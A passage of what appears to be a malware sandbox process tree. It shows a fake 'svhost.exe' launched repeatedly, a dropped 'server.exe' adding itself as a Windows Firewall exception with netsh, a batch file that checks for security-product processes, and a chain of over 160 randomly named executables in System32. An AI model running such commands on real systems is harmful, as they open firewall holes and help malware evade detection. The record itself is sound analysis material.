      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4348
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13476
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14032
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13904
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9556
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13520
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9436
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12844
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12900
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13668
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:15708
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8144
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:15876
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9316
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8296
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13860
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:18440
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:19536
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:23492
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:22584
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:23824
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13740
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:19232
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:25976
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:25188
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:568
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:24036
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:25920
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:27160
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1084
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12828
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:16464
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:11868
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:19852
- - C:\Users\Admin\AppData\Local\Temp\Files\testingg.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\testingg.exe"
    3⤵
    PID:5936
  - - C:\Users\Admin\AppData\Roaming\server.exe
      "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      PID:4804
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:4812
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
        5⤵
        Modifies Windows Firewall
        
        PID:5596
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:72
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1212
        5⤵
        
        PID:19060
- - C:\Users\Admin\AppData\Local\Temp\Files\up.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\up.exe"
    3⤵
    PID:1852
- - C:\Users\Admin\AppData\Local\Temp\Files\bildnewl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\bildnewl.exe"
    3⤵
    PID:2032
- - C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"
    3⤵
    PID:792
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6480
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 312
      4⤵
      Program crash
      PID:3864
- - C:\Users\Admin\AppData\Local\Temp\Files\vpn.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\vpn.exe"
    3⤵
    PID:5320
- - C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"
    3⤵
    PID:14380
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Attacked Attacked.bat & Attacked.bat
      4⤵
      PID:16340
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:15432
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        
        PID:6784
- - C:\Users\Admin\AppData\Local\Temp\Files\update.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
    3⤵
    PID:15188
- - C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe"
    3⤵
    PID:17868
- - C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"
    3⤵
    PID:18224
- - C:\Users\Admin\AppData\Local\Temp\Files\exe008.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\exe008.exe"
    3⤵
    PID:17920
  - - C:\Windows\SysWOW64\Hckjmd32.exe
      C:\Windows\system32\Hckjmd32.exe
      4⤵
      PID:18068
    - - C:\Windows\SysWOW64\Ilkhmecd.exe
        
        C:\Windows\system32\Ilkhmecd.exe
        5⤵
        
        PID:18388
      - C:\Windows\SysWOW64\Ifbipn32.exe
        
        C:\Windows\system32\Ifbipn32.exe
        6⤵
        
        PID:17832
        
        C:\Windows\SysWOW64\Jihkmhjc.exe
        
        C:\Windows\system32\Jihkmhjc.exe
        7⤵
        
        PID:17696
        
        C:\Windows\SysWOW64\Jcploa32.exe
        
        C:\Windows\system32\Jcploa32.exe
        8⤵
        
        PID:18060
        
        C:\Windows\SysWOW64\Kecemi32.exe
        
        C:\Windows\system32\Kecemi32.exe
        9⤵
        
        PID:17620
        
        C:\Windows\SysWOW64\Kiancgbi.exe
        
        C:\Windows\system32\Kiancgbi.exe
        10⤵
        
        PID:15308
        
        C:\Windows\SysWOW64\Kehohh32.exe
        
        C:\Windows\system32\Kehohh32.exe
        11⤵
        
        PID:18504
        
        C:\Windows\SysWOW64\Kfjhgk32.exe
        
        C:\Windows\system32\Kfjhgk32.exe
        12⤵
        
        PID:18628
        
        C:\Windows\SysWOW64\Llimeaia.exe
        
        C:\Windows\system32\Llimeaia.exe
        13⤵
        
        PID:18700
        
        C:\Windows\SysWOW64\Lbebgkol.exe
        
        C:\Windows\system32\Lbebgkol.exe
        14⤵
        
        PID:18796
        
        C:\Windows\SysWOW64\Lbhomkmi.exe
        
        C:\Windows\system32\Lbhomkmi.exe
        15⤵
        
        PID:18860
        
        C:\Windows\SysWOW64\Mclhhj32.exe
        
        C:\Windows\system32\Mclhhj32.exe
        16⤵
        
        PID:18932
        
        C:\Windows\SysWOW64\Mmbmec32.exe
        
        C:\Windows\system32\Mmbmec32.exe
        17⤵
        
        PID:18980
        
        C:\Windows\SysWOW64\Mgmndh32.exe
        
        C:\Windows\system32\Mgmndh32.exe
        18⤵
        
        PID:19076
        
        C:\Windows\SysWOW64\Mgokihke.exe
        
        C:\Windows\system32\Mgokihke.exe
        19⤵
        
        PID:19132
        
        C:\Windows\SysWOW64\Mgagogib.exe
        
        C:\Windows\system32\Mgagogib.exe
        20⤵
        
        PID:19252
        
        C:\Windows\SysWOW64\Ncjdihld.exe
        
        C:\Windows\system32\Ncjdihld.exe
        21⤵
        
        PID:19356
        
        C:\Windows\SysWOW64\Ngmgkfoe.exe
        
        C:\Windows\system32\Ngmgkfoe.exe
        22⤵
        
        PID:17864
        
        C:\Windows\SysWOW64\Onlhbobl.exe
        
        C:\Windows\system32\Onlhbobl.exe
        23⤵
        
        PID:18488
        
        C:\Windows\SysWOW64\Onqbno32.exe
        
        C:\Windows\system32\Onqbno32.exe
        24⤵
        
        PID:18668
        
        C:\Windows\SysWOW64\Pmhldk32.exe
        
        C:\Windows\system32\Pmhldk32.exe
        25⤵
        
        PID:18808
        
        C:\Windows\SysWOW64\Pgnpacpb.exe
        
        C:\Windows\system32\Pgnpacpb.exe
        26⤵
        
        PID:18912
        
        C:\Windows\SysWOW64\Pdapkgol.exe
        
        C:\Windows\system32\Pdapkgol.exe
        27⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Pmoaei32.exe
        
        C:\Windows\system32\Pmoaei32.exe
        28⤵
        
        PID:19140
        
        C:\Windows\SysWOW64\Qfgfnoae.exe
        
        C:\Windows\system32\Qfgfnoae.exe
        29⤵
        
        PID:19232
        
        C:\Windows\SysWOW64\Qdhfkf32.exe
        
        C:\Windows\system32\Qdhfkf32.exe
        30⤵
        
        PID:17512
        
        C:\Windows\SysWOW64\Aflpio32.exe
        
        C:\Windows\system32\Aflpio32.exe
        31⤵
        
        PID:19404
        
        C:\Windows\SysWOW64\Anedpklo.exe
        
        C:\Windows\system32\Anedpklo.exe
        32⤵
        
        PID:18348
        
        C:\Windows\SysWOW64\Aqfmafip.exe
        
        C:\Windows\system32\Aqfmafip.exe
        33⤵
        
        PID:18600
        
        C:\Windows\SysWOW64\Amoklgla.exe
        
        C:\Windows\system32\Amoklgla.exe
        34⤵
        
        PID:18824
        
        C:\Windows\SysWOW64\Bgjhdo32.exe
        
        C:\Windows\system32\Bgjhdo32.exe
        35⤵
        
        PID:18276
        
        C:\Windows\SysWOW64\Cebbhc32.exe
        
        C:\Windows\system32\Cebbhc32.exe
        36⤵
        
        PID:19376
        
        C:\Windows\SysWOW64\Cakpccfh.exe
        
        C:\Windows\system32\Cakpccfh.exe
        37⤵
        
        PID:18648
        
        C:\Windows\SysWOW64\Cmgjcd32.exe
        
        C:\Windows\system32\Cmgjcd32.exe
        38⤵
        
        PID:14060
        
        C:\Windows\SysWOW64\Dhlnqm32.exe
        
        C:\Windows\system32\Dhlnqm32.exe
        39⤵
        
        PID:19412
        
        C:\Windows\SysWOW64\Ehjjbkkm.exe
        
        C:\Windows\system32\Ehjjbkkm.exe
        40⤵
        
        PID:18676
        
        C:\Windows\SysWOW64\Eenkkojf.exe
        
        C:\Windows\system32\Eenkkojf.exe
        41⤵
        
        PID:19496
        
        C:\Windows\SysWOW64\Edfdbkml.exe
        
        C:\Windows\system32\Edfdbkml.exe
        42⤵
        
        PID:19612
        
        C:\Windows\SysWOW64\Fnqeppaj.exe
        
        C:\Windows\system32\Fnqeppaj.exe
        43⤵
        
        PID:19728
        
        C:\Windows\SysWOW64\Fhkcih32.exe
        
        C:\Windows\system32\Fhkcih32.exe
        44⤵
        
        PID:19896
        
        C:\Windows\SysWOW64\Ghbiiggb.exe
        
        C:\Windows\system32\Ghbiiggb.exe
        45⤵
        
        PID:20112
        
        C:\Windows\SysWOW64\Gfhfhk32.exe
        
        C:\Windows\system32\Gfhfhk32.exe
        46⤵
        
        PID:20264
        
        C:\Windows\SysWOW64\Ghiojfaj.exe
        
        C:\Windows\system32\Ghiojfaj.exe
        47⤵
        
        PID:20456
        
        C:\Windows\SysWOW64\Hddijgbi.exe
        
        C:\Windows\system32\Hddijgbi.exe
        48⤵
        
        PID:19528
        
        C:\Windows\SysWOW64\Hffbjihi.exe
        
        C:\Windows\system32\Hffbjihi.exe
        49⤵
        
        PID:1344
        
        C:\Windows\SysWOW64\Ifhooi32.exe
        
        C:\Windows\system32\Ifhooi32.exe
        50⤵
        
        PID:19792
        
        C:\Windows\SysWOW64\Ibamjjih.exe
        
        C:\Windows\system32\Ibamjjih.exe
        51⤵
        
        PID:19980
        
        C:\Windows\SysWOW64\Jfflqg32.exe
        
        C:\Windows\system32\Jfflqg32.exe
        52⤵
        
        PID:20568
        
        C:\Windows\SysWOW64\Lndfag32.exe
        
        C:\Windows\system32\Lndfag32.exe
        53⤵
        
        PID:21796
        
        C:\Windows\SysWOW64\Nifcak32.exe
        
        C:\Windows\system32\Nifcak32.exe
        54⤵
        
        PID:19964
        
        C:\Windows\SysWOW64\Phqbde32.exe
        
        C:\Windows\system32\Phqbde32.exe
        55⤵
        
        PID:23304
        
        C:\Windows\SysWOW64\Aqcjaq32.exe
        
        C:\Windows\system32\Aqcjaq32.exe
        56⤵
        
        PID:23404
        
        C:\Windows\SysWOW64\Bihalalg.exe
        
        C:\Windows\system32\Bihalalg.exe
        57⤵
        
        PID:22208
        
        C:\Windows\SysWOW64\Bcpbojjk.exe
        
        C:\Windows\system32\Bcpbojjk.exe
        58⤵
        
        PID:22260
        
        C:\Windows\SysWOW64\Bfqkpe32.exe
        
        C:\Windows\system32\Bfqkpe32.exe
        59⤵
        
        PID:22344
        
        C:\Windows\SysWOW64\Cpkloj32.exe
        
        C:\Windows\system32\Cpkloj32.exe
        60⤵
        
        PID:22448
        
        C:\Windows\SysWOW64\Cakiimcl.exe
        
        C:\Windows\system32\Cakiimcl.exe
        61⤵
        
        PID:22508
        
        C:\Windows\SysWOW64\Dmfcindk.exe
        
        C:\Windows\system32\Dmfcindk.exe
        62⤵
        
        PID:20408
        
        C:\Windows\SysWOW64\Diamin32.exe
        
        C:\Windows\system32\Diamin32.exe
        63⤵
        
        PID:21372
        
        C:\Windows\SysWOW64\Ddinlf32.exe
        
        C:\Windows\system32\Ddinlf32.exe
        64⤵
        
        PID:20076
        
        C:\Windows\SysWOW64\Eikpom32.exe
        
        C:\Windows\system32\Eikpom32.exe
        65⤵
        
        PID:20704
        
        C:\Windows\SysWOW64\Ehlpmdfo.exe
        
        C:\Windows\system32\Ehlpmdfo.exe
        66⤵
        
        PID:20900
        
        C:\Windows\SysWOW64\Fibfplhg.exe
        
        C:\Windows\system32\Fibfplhg.exe
        67⤵
        
        PID:20980
        
        C:\Windows\SysWOW64\Fmbkkjlk.exe
        
        C:\Windows\system32\Fmbkkjlk.exe
        68⤵
        
        PID:21128
        
        C:\Windows\SysWOW64\Ginekjnj.exe
        
        C:\Windows\system32\Ginekjnj.exe
        69⤵
        
        PID:21420
        
        C:\Windows\SysWOW64\Gipbaj32.exe
        
        C:\Windows\system32\Gipbaj32.exe
        70⤵
        
        PID:19884
        
        C:\Windows\SysWOW64\Hdmloaee.exe
        
        C:\Windows\system32\Hdmloaee.exe
        71⤵
        
        PID:20896
        
        C:\Windows\SysWOW64\Haefcepj.exe
        
        C:\Windows\system32\Haefcepj.exe
        72⤵
        
        PID:21664
        
        C:\Windows\SysWOW64\Hjchmg32.exe
        
        C:\Windows\system32\Hjchmg32.exe
        73⤵
        
        PID:21752
        
        C:\Windows\SysWOW64\Ikbdgjbe.exe
        
        C:\Windows\system32\Ikbdgjbe.exe
        74⤵
        
        PID:21836
        
        C:\Windows\SysWOW64\Ijgahf32.exe
        
        C:\Windows\system32\Ijgahf32.exe
        75⤵
        
        PID:21956
        
        C:\Windows\SysWOW64\Ihmkamkf.exe
        
        C:\Windows\system32\Ihmkamkf.exe
        76⤵
        
        PID:21408
        
        C:\Windows\SysWOW64\Jhdabl32.exe
        
        C:\Windows\system32\Jhdabl32.exe
        77⤵
        
        PID:22640
        
        C:\Windows\SysWOW64\Jginci32.exe
        
        C:\Windows\system32\Jginci32.exe
        78⤵
        
        PID:22724
        
        C:\Windows\SysWOW64\Jglkih32.exe
        
        C:\Windows\system32\Jglkih32.exe
        79⤵
        
        PID:22852
        
        C:\Windows\SysWOW64\Keddmlbh.exe
        
        C:\Windows\system32\Keddmlbh.exe
        80⤵
        
        PID:22912
        
        C:\Windows\SysWOW64\Kanbhlfj.exe
        
        C:\Windows\system32\Kanbhlfj.exe
        81⤵
        
        PID:23060
        
        C:\Windows\SysWOW64\Llhppd32.exe
        
        C:\Windows\system32\Llhppd32.exe
        82⤵
        
        PID:22900
        
        C:\Windows\SysWOW64\Lilpjiad.exe
        
        C:\Windows\system32\Lilpjiad.exe
        83⤵
        
        PID:23356
        
        C:\Windows\SysWOW64\Mnbkhngq.exe
        
        C:\Windows\system32\Mnbkhngq.exe
        84⤵
        
        PID:22336
        
        C:\Windows\SysWOW64\Mndhnnen.exe
        
        C:\Windows\system32\Mndhnnen.exe
        85⤵
        
        PID:22432
        
        C:\Windows\SysWOW64\Nloohanp.exe
        
        C:\Windows\system32\Nloohanp.exe
        86⤵
        
        PID:20088
        
        C:\Windows\SysWOW64\Oihhle32.exe
        
        C:\Windows\system32\Oihhle32.exe
        87⤵
        
        PID:20656
        
        C:\Windows\SysWOW64\Oiakbc32.exe
        
        C:\Windows\system32\Oiakbc32.exe
        88⤵
        
        PID:20904
        
        C:\Windows\SysWOW64\Pemebdbh.exe
        
        C:\Windows\system32\Pemebdbh.exe
        89⤵
        
        PID:21164
        
        C:\Windows\SysWOW64\Plkgjmep.exe
        
        C:\Windows\system32\Plkgjmep.exe
        90⤵
        
        PID:21396
        
        C:\Windows\SysWOW64\Aehenbhk.exe
        
        C:\Windows\system32\Aehenbhk.exe
        91⤵
        
        PID:21564
        
        C:\Windows\SysWOW64\Ahkkem32.exe
        
        C:\Windows\system32\Ahkkem32.exe
        92⤵
        
        PID:21592
        
        C:\Windows\SysWOW64\Aojlmf32.exe
        
        C:\Windows\system32\Aojlmf32.exe
        93⤵
        
        PID:21776
        
        C:\Windows\SysWOW64\Bffapp32.exe
        
        C:\Windows\system32\Bffapp32.exe
        94⤵
        
        PID:21976
        
        C:\Windows\SysWOW64\Boabnepi.exe
        
        C:\Windows\system32\Boabnepi.exe
        95⤵
        
        PID:22628
        
        C:\Windows\SysWOW64\Ckoice32.exe
        
        C:\Windows\system32\Ckoice32.exe
        96⤵
        
        PID:22948
        
        C:\Windows\SysWOW64\Doakecbf.exe
        
        C:\Windows\system32\Doakecbf.exe
        97⤵
        
        PID:23052
        
        C:\Windows\SysWOW64\Dfpmmmem.exe
        
        C:\Windows\system32\Dfpmmmem.exe
        98⤵
        
        PID:11276
        
        C:\Windows\SysWOW64\Fpijlpnk.exe
        
        C:\Windows\system32\Fpijlpnk.exe
        99⤵
        
        PID:19576
        
        C:\Windows\SysWOW64\Fdlmnn32.exe
        
        C:\Windows\system32\Fdlmnn32.exe
        100⤵
        
        PID:22660
        
        C:\Windows\SysWOW64\Ffleoi32.exe
        
        C:\Windows\system32\Ffleoi32.exe
        101⤵
        
        PID:21180
        
        C:\Windows\SysWOW64\Gmijab32.exe
        
        C:\Windows\system32\Gmijab32.exe
        102⤵
        
        PID:21500
        
        C:\Windows\SysWOW64\Gdepdl32.exe
        
        C:\Windows\system32\Gdepdl32.exe
        103⤵
        
        PID:20860
        
        C:\Windows\SysWOW64\Gibhlc32.exe
        
        C:\Windows\system32\Gibhlc32.exe
        104⤵
        
        PID:21660
        
        C:\Windows\SysWOW64\Hlencnag.exe
        
        C:\Windows\system32\Hlencnag.exe
        105⤵
        
        PID:16764
        
        C:\Windows\SysWOW64\Hllddm32.exe
        
        C:\Windows\system32\Hllddm32.exe
        106⤵
        
        PID:23096
        
        C:\Windows\SysWOW64\Icoogeja.exe
        
        C:\Windows\system32\Icoogeja.exe
        107⤵
        
        PID:22304
        
        C:\Windows\SysWOW64\Jcfegddj.exe
        
        C:\Windows\system32\Jcfegddj.exe
        108⤵
        
        PID:20296
        
        C:\Windows\SysWOW64\Jnnfjm32.exe
        
        C:\Windows\system32\Jnnfjm32.exe
        109⤵
        
        PID:20680
        
        C:\Windows\SysWOW64\Jcmkhc32.exe
        
        C:\Windows\system32\Jcmkhc32.exe
        110⤵
        
        PID:21388
        
        C:\Windows\SysWOW64\Kcgnnb32.exe
        
        C:\Windows\system32\Kcgnnb32.exe
        111⤵
        
        PID:18840
        
        C:\Windows\SysWOW64\Kqmkmfbn.exe
        
        C:\Windows\system32\Kqmkmfbn.exe
        112⤵
        
        PID:22000
        
        C:\Windows\SysWOW64\Lgippphh.exe
        
        C:\Windows\system32\Lgippphh.exe
        113⤵
        
        PID:22532
        
        C:\Windows\SysWOW64\Lmkbcf32.exe
        
        C:\Windows\system32\Lmkbcf32.exe
        114⤵
        
        PID:22964
        
        C:\Windows\SysWOW64\Mjfhmikl.exe
        
        C:\Windows\system32\Mjfhmikl.exe
        115⤵
        
        PID:22520
        
        C:\Windows\SysWOW64\Nmkkjddg.exe
        
        C:\Windows\system32\Nmkkjddg.exe
        116⤵
        
        PID:17812
        
        C:\Windows\SysWOW64\Nakpebhk.exe
        
        C:\Windows\system32\Nakpebhk.exe
        117⤵
        
        PID:20812
        
        C:\Windows\SysWOW64\Oapjqa32.exe
        
        C:\Windows\system32\Oapjqa32.exe
        118⤵
        
        PID:21416
        
        C:\Windows\SysWOW64\Oaeclqpq.exe
        
        C:\Windows\system32\Oaeclqpq.exe
        119⤵
        
        PID:18628
        
        C:\Windows\SysWOW64\Oaimgp32.exe
        
        C:\Windows\system32\Oaimgp32.exe
        120⤵
        
        PID:23472
        
        C:\Windows\SysWOW64\Pogpfc32.exe
        
        C:\Windows\system32\Pogpfc32.exe
        121⤵
        
        PID:18984
        
        C:\Windows\SysWOW64\Pdchoj32.exe
        
        C:\Windows\system32\Pdchoj32.exe
        122⤵
        
        PID:18948
        
        C:\Windows\SysWOW64\Amqfbo32.exe
        
        C:\Windows\system32\Amqfbo32.exe
        123⤵
        
        PID:15308
        
        C:\Windows\SysWOW64\Aachdlfn.exe
        
        C:\Windows\system32\Aachdlfn.exe
        124⤵
        
        PID:20992
        
        C:\Windows\SysWOW64\Bahaol32.exe
        
        C:\Windows\system32\Bahaol32.exe
        125⤵
        
        PID:23448
        
        C:\Windows\SysWOW64\Bononpop.exe
        
        C:\Windows\system32\Bononpop.exe
        126⤵
        
        PID:19076
        
        C:\Windows\SysWOW64\Baohpklq.exe
        
        C:\Windows\system32\Baohpklq.exe
        127⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Colkon32.exe
        
        C:\Windows\system32\Colkon32.exe
        128⤵
        
        PID:22284
        
        C:\Windows\SysWOW64\Cbmdai32.exe
        
        C:\Windows\system32\Cbmdai32.exe
        129⤵
        
        PID:20764
        
        C:\Windows\SysWOW64\Dmeedamd.exe
        
        C:\Windows\system32\Dmeedamd.exe
        130⤵
        
        PID:18888
        
        C:\Windows\SysWOW64\Dnhnai32.exe
        
        C:\Windows\system32\Dnhnai32.exe
        131⤵
        
        PID:19132
        
        C:\Windows\SysWOW64\Dohkkl32.exe
        
        C:\Windows\system32\Dohkkl32.exe
        132⤵
        
        PID:19260
        
        C:\Windows\SysWOW64\Dkokpmnf.exe
        
        C:\Windows\system32\Dkokpmnf.exe
        133⤵
        
        PID:22800
        
        C:\Windows\SysWOW64\Emqdpocf.exe
        
        C:\Windows\system32\Emqdpocf.exe
        134⤵
        
        PID:22560
        
        C:\Windows\SysWOW64\Epfgljlb.exe
        
        C:\Windows\system32\Epfgljlb.exe
        135⤵
        
        PID:11888
        
        C:\Windows\SysWOW64\Fiqhko32.exe
        
        C:\Windows\system32\Fiqhko32.exe
        136⤵
        
        PID:18420
        
        C:\Windows\SysWOW64\Fnpmheme.exe
        
        C:\Windows\system32\Fnpmheme.exe
        137⤵
        
        PID:22428
        
        C:\Windows\SysWOW64\Felbkobo.exe
        
        C:\Windows\system32\Felbkobo.exe
        138⤵
        
        PID:19436
        
        C:\Windows\SysWOW64\Gfloeb32.exe
        
        C:\Windows\system32\Gfloeb32.exe
        139⤵
        
        PID:14552
        
        C:\Windows\SysWOW64\Gpfpcg32.exe
        
        C:\Windows\system32\Gpfpcg32.exe
        140⤵
        
        PID:15772
        
        C:\Windows\SysWOW64\Glbjch32.exe
        
        C:\Windows\system32\Glbjch32.exe
        141⤵
        
        PID:18792
        
        C:\Windows\SysWOW64\Hlipdg32.exe
        
        C:\Windows\system32\Hlipdg32.exe
        142⤵
        
        PID:19524
        
        C:\Windows\SysWOW64\Hiomck32.exe
        
        C:\Windows\system32\Hiomck32.exe
        143⤵
        
        PID:18980
        
        C:\Windows\SysWOW64\Iblkgphi.exe
        
        C:\Windows\system32\Iblkgphi.exe
        144⤵
        
        PID:20460
        
        C:\Windows\SysWOW64\Ilglee32.exe
        
        C:\Windows\system32\Ilglee32.exe
        145⤵
        
        PID:17696
        
        C:\Windows\SysWOW64\Jccago32.exe
        
        C:\Windows\system32\Jccago32.exe
        146⤵
        
        PID:19880
        
        C:\Windows\SysWOW64\Jgajnm32.exe
        
        C:\Windows\system32\Jgajnm32.exe
        147⤵
        
        PID:19800
        
        C:\Windows\SysWOW64\Jolobo32.exe
        
        C:\Windows\system32\Jolobo32.exe
        148⤵
        
        PID:23620
        
        C:\Windows\SysWOW64\Jlblacci.exe
        
        C:\Windows\system32\Jlblacci.exe
        149⤵
        
        PID:23740
        
        C:\Windows\SysWOW64\Joahmobm.exe
        
        C:\Windows\system32\Joahmobm.exe
        150⤵
        
        PID:23776
        
        C:\Windows\SysWOW64\Kndeqfhi.exe
        
        C:\Windows\system32\Kndeqfhi.exe
        151⤵
        
        PID:23868
        
        C:\Windows\SysWOW64\Kniole32.exe
        
        C:\Windows\system32\Kniole32.exe
        152⤵
        
        PID:24004
        
        C:\Windows\SysWOW64\Lnnhgdpo.exe
        
        C:\Windows\system32\Lnnhgdpo.exe
        153⤵
        
        PID:24112
        
        C:\Windows\SysWOW64\Lnbabdli.exe
        
        C:\Windows\system32\Lnbabdli.exe
        154⤵
        
        PID:24228
        
        C:\Windows\SysWOW64\Lfnfff32.exe
        
        C:\Windows\system32\Lfnfff32.exe
        155⤵
        
        PID:24296
        
        C:\Windows\SysWOW64\Lqegiogh.exe
        
        C:\Windows\system32\Lqegiogh.exe
        156⤵
        
        PID:24364
        
        C:\Windows\SysWOW64\Mjbemcic.exe
        
        C:\Windows\system32\Mjbemcic.exe
        157⤵
        
        PID:24508
        
        C:\Windows\SysWOW64\Mgfefhhl.exe
        
        C:\Windows\system32\Mgfefhhl.exe
        158⤵
        
        PID:14060
        
        C:\Windows\SysWOW64\Mgkoag32.exe
        
        C:\Windows\system32\Mgkoag32.exe
        159⤵
        
        PID:23700
        
        C:\Windows\SysWOW64\Ngphmfpb.exe
        
        C:\Windows\system32\Ngphmfpb.exe
        160⤵
        
        PID:23920
        
        C:\Windows\SysWOW64\Ocnobf32.exe
        
        C:\Windows\system32\Ocnobf32.exe
        161⤵
        
        PID:19500
        
        C:\Windows\SysWOW64\Ojjddpeh.exe
        
        C:\Windows\system32\Ojjddpeh.exe
        162⤵
        
        PID:24288
        
        C:\Windows\SysWOW64\Pcione32.exe
        
        C:\Windows\system32\Pcione32.exe
        163⤵
        
        PID:24392
        
        C:\Windows\SysWOW64\Paplmibh.exe
        
